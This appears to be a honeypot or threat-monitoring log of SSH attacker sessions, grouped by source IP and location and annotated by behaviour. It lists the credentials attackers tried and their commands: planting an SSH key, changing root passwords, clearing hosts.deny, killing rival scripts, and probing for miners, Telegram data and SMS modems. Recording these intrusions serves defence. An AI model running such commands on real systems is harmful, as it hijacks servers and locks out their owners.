$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cQ6jpUTEBZqy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_53 (41.33.91.226) β€” Cairo, Egypt Β· 3 sessions Β· 59 cmds
2026-05-23 01:52 EDT Β· as admin/fjbdfdjkdsfs541544, aso/aso, root/Talent123
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "aso\nSWsGBQL0XcCP\nSWsGBQL0XcCP"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "aso\nSWsGBQL0XcCP\nSWsGBQL0XcCP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "fjbdfdjkdsfs541544\nvuiCF94SgTkt\nvuiCF94SgTkt"|passwd|bash
$ echo "fjbdfdjkdsfs541544\nvuiCF94SgTkt\nvuiCF94SgTkt\n"|passwd
$ echo "root:WR7RGNBuIpQ1"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wraith_root_54 (217.154.106.153) β€” Madrid, Spain Β· 4 sessions Β· 61 cmds
2026-05-21 23:02 EDT Β· as admin/fjbdfdjkdsfs541544, aroot/aroot, aso/aso
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\n519PMD0klgXd\n519PMD0klgXd"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\n519PMD0klgXd\n519PMD0klgXd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "aso\nGE3n5sV14Tby\nGE3n5sV14Tby"|passwd|bash
$ echo "aso\nGE3n5sV14Tby\nGE3n5sV14Tby\n"|passwd
$ echo "root:KbwVbxe6oKoE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 star_root_26 (65.38.97.199) β€” Sulphur Springs, United States Β· 1 session Β· 20 cmds
2026-05-28 00:13 EDT Β· as aso/aso
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "aso\niZsAFtC2Hi64\niZsAFtC2Hi64"|passwd|bash
$ Enter new UNIX password:
$ echo "aso\niZsAFtC2Hi64\niZsAFtC2Hi64\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_8 (115.241.83.2) β€” Delhi, India Β· 2 sessions Β· 39 cmds
2026-05-17 03:58 EDT Β· as admin/fjbdfdjkdsfs541544, root/Aa@1234567
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nE0hAehZ1fg79\nE0hAehZ1fg79"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nE0hAehZ1fg79\nE0hAehZ1fg79\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:xRLQ8at7rUk5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wraith_root_55 (178.175.167.17) β€” Anenii Noi, Moldova Β· 1 session Β· 9 cmds
2026-05-27 23:23 EDT Β· as root/123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 yankee_root_26 (20.12.41.6) β€” Boydton, United States Β· 2 sessions Β· 40 cmds
2026-05-04 10:34 EDT Β· as admin/fjbdfdjkdsfs541544, git/pass123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nag5n6I2eVRmV\nag5n6I2eVRmV"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nag5n6I2eVRmV\nag5n6I2eVRmV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "pass123456\nSMOhduK03pWY\nSMOhduK03pWY"|passwd|bash
$ echo "pass123456\nSMOhduK03pWY\nSMOhduK03pWY\n"|passwd
🎭 bibimbap_root_9 (121.142.87.218) β€” Gimpo-si, South Korea Β· 3 sessions Β· 58 cmds
2026-05-06 10:00 EDT Β· as admin/fjbdfdjkdsfs541544, root/123qweasdZXC, root/Server@2024
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:ynvII4JKY79d"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "fjbdfdjkdsfs541544\nlnKhr7PQRmUM\nlnKhr7PQRmUM"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nlnKhr7PQRmUM\nlnKhr7PQRmUM\n"|passwd
$ echo "root:QpfujQUnlcI9"|chpasswd|bash
🎭 monet_root_4 (79.143.189.125) β€” Lauterbourg, France Β· 4 sessions Β· 78 cmds
2026-05-27 21:10 EDT Β· as admin/fjbdfdjkdsfs541544, root/Y4k1nm4suk.2019, root/aabb1234
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\ncPKVQCcJk3Tt\ncPKVQCcJk3Tt"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\ncPKVQCcJk3Tt\ncPKVQCcJk3Tt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:bRDIBkkuvSY1"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo -e "1234!@#$\nz9gwKfVZW4BE\nz9gwKfVZW4BE"|passwd|bash
$ echo "1234!@#$\nz9gwKfVZW4BE\nz9gwKfVZW4BE\n"|passwd
$ echo "root:pA6hN30rh88B"|chpasswd|bash
🎭 ghost_root_69 (101.47.156.21) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-27 21:08 EDT Β· as admin/fjbdfdjkdsfs541544, odoo17/12345
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nIQm9PLROgfJm\nIQm9PLROgfJm"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nIQm9PLROgfJm\nIQm9PLROgfJm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "12345\nF1fgJNYO9kpv\nF1fgJNYO9kpv"|passwd|bash
$ echo "12345\nF1fgJNYO9kpv\nF1fgJNYO9kpv\n"|passwd
🎭 cipher_root_47 (46.70.206.6) β€” Yerevan, Armenia Β· 3 sessions Β· 60 cmds
2026-05-27 21:12 EDT Β· as admin/fjbdfdjkdsfs541544, mgeweb/mgeweb, simon/simon
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "simon\nHS0qKlT3Ga5w\nHS0qKlT3Ga5w"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "simon\nHS0qKlT3Ga5w\nHS0qKlT3Ga5w\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "fjbdfdjkdsfs541544\nOZE4PcGkxv4M\nOZE4PcGkxv4M"|passwd|bash
$ echo "fjbdfdjkdsfs541544\nOZE4PcGkxv4M\nOZE4PcGkxv4M\n"|passwd
$ echo -e "mgeweb\nlRbZki3JENPe\nlRbZki3JENPe"|passwd|bash
$ echo "mgeweb\nlRbZki3JENPe\nlRbZki3JENPe\n"|passwd
🎭 shadow_root_49 (95.81.112.138) β€” Helsinki, Finland Β· 3 sessions Β· 58 cmds
2026-05-27 21:13 EDT Β· as root/Li123456., root/aabb1234, ubuntu/1234!@#$
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "1234!@#$\ntqWwc22yJFGu\ntqWwc22yJFGu"|passwd|bash
$ Enter new UNIX password:
$ echo "1234!@#$\ntqWwc22yJFGu\ntqWwc22yJFGu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:glDybFrcFelD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:VLBhr6RFellw"|chpasswd|bash
🎭 eagle_root_25 (137.184.179.94) β€” Santa Clara, United States Β· 4 sessions Β· 78 cmds
2026-05-27 21:12 EDT Β· as admin/fjbdfdjkdsfs541544, root/Li123456., root/Y4k1nm4suk.2019
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nUDebdiUHX153\nUDebdiUHX153"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nUDebdiUHX153\nUDebdiUHX153\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
